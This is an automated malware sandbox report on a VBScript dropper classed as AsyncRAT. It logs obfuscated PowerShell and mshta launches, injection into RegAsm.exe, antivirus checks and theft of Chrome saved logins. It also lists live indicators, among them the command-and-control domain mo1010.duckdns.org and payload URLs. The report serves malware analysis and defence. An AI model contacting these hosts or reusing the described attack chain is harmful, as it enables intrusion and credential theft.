Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Yara detected AsyncRAT
Source: Yara match File source: 27.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.886169058.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.888448368.0000000003161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5644, type: MEMORYSTR
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
AV process strings found (often used to terminate AV products)
Source: powershell.exe, 00000002.00000002.433589282.000001F4005B6000.00000004.00000001.sdmp Binary or memory string: (C:\Program Files\AVG\Antivirus\AVGUI.exe

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 490264 Sample: KDH32783JHC73287SDF87.VBS Startdate: 25/09/2021 Architecture: WINDOWS Score: 100 90 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->90 92 Found malware configuration 2->92 94 Antivirus detection for dropped file 2->94 96 13 other signatures 2->96 12 wscript.exe 1 2->12         started        process3 signatures4 114 VBScript performs obfuscated calls to suspicious functions 12->114 116 Wscript starts Powershell (via cmd or directly) 12->116 118 Obfuscated command line found 12->118 15 powershell.exe 14 27 12->15         started        process5 dnsIp6 76 104.21.26.226, 49737, 80 CLOUDFLARENETUS United States 15->76 78 java-eg.com 104.21.66.125, 443, 49738, 49739 CLOUDFLARENETUS United States 15->78 80 chilp.it 172.67.139.125, 443, 49736 CLOUDFLARENETUS United States 15->80 62 C:\Users\...\WindowsStateRepositoryCore.bat, ASCII 15->62 dropped 64 C:\Users\Public\Service.ps1, ASCII 15->64 dropped 66 C:\Users\Public\Music\vb.vbs, ASCII 15->66 dropped 68 3 other malicious files 15->68 dropped 86 Creates an undocumented autostart registry key 15->86 88 Compiles code for process injection (via .Net compiler) 15->88 20 wscript.exe 15->20         started        23 cmd.exe 1 15->23         started        25 conhost.exe 15->25         started        file7 signatures8 process9 signatures10 98 Wscript starts Powershell (via cmd or directly) 20->98 27 cmd.exe 20->27         started        100 Obfuscated command line found 23->100 102 Bypasses PowerShell execution policy 23->102 30 powershell.exe 1 25 23->30         started        32 conhost.exe 23->32         started        process11 signatures12 112 Obfuscated command line found 27->112 34 mshta.exe 27->34         started        36 conhost.exe 27->36         started        38 wscript.exe 1 30->38         started        process13 signatures14 41 powershell.exe 34->41         started        104 Wscript starts Powershell (via cmd or directly) 38->104 45 cmd.exe 38->45         started        process15 file16 72 C:\Users\user\AppData\...\vfl4qio1.cmdline, UTF-8 41->72 dropped 74 C:\Users\user\AppData\Local\...\vfl4qio1.0.cs, C++ 41->74 dropped 106 Writes to foreign memory regions 41->106 108 Injects a PE file into a foreign processes 41->108 47 RegAsm.exe 41->47         started        51 csc.exe 41->51         started        54 conhost.exe 41->54         started        110 Wscript starts Powershell (via cmd or directly) 45->110 56 conhost.exe 45->56         started        58 powershell.exe 45->58         started        signatures17 process18 dnsIp19 82 mo1010.duckdns.org 77.247.127.198, 1010, 49746, 49766 CLOUVIDERClouvider-GlobalASNGB United Kingdom 47->82 84 Tries to harvest and steal browser information (history, passwords, etc) 47->84 70 C:\Users\user\AppData\Local\...\vfl4qio1.dll, PE32 51->70 dropped 60 cvtres.exe 51->60         started        file20 signatures21 process22
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.26.226
 unknown United States
13335 CLOUDFLARENETUS false
104.21.66.125
 java-eg.com United States
13335 CLOUDFLARENETUS false
77.247.127.198
 mo1010.duckdns.org United Kingdom
62240 CLOUVIDERClouvider-GlobalASNGB true
172.67.139.125
 chilp.it United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
java-eg.com 104.21.66.125 true
mo1010.duckdns.org 77.247.127.198 true
chilp.it 172.67.139.125 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://chilp.it/7854610 false
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://chilp.it/7854610 false
  • Avira URL Cloud: safe
 unknown
https://java-eg.com/wp-content/themes/twentyseventeen/template-parts/header/java/i2.jpg false
  • Avira URL Cloud: safe
 unknown
https://java-eg.com/wp-content/themes/twentyseventeen/template-parts/header/java/php.jpg false
  • Avira URL Cloud: safe
 unknown
mo1010.duckdns.org true
  • Avira URL Cloud: safe
 unknown